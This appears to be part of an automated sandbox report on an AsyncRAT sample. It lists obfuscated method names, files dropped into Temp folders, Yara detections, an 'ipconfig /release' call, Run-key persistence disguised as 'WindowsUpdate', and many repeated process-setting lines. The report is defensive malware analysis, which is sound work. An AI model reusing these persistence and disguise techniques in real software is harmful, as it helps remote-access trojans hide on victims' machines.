          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, nEUsGCMtCWeF.csHigh entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, utoIMOcfPuYy.csHigh entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeFile created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptFile created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeJump to dropped file
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptFile created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.pptJump to dropped file
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptFile created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.pptJump to dropped file

          Boot Survival

          barindex
          Yara detected AsyncRAT
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007825A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_007825A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0070FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_0070FC8A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010525A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_010525A0
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FDFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00FDFC8A
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
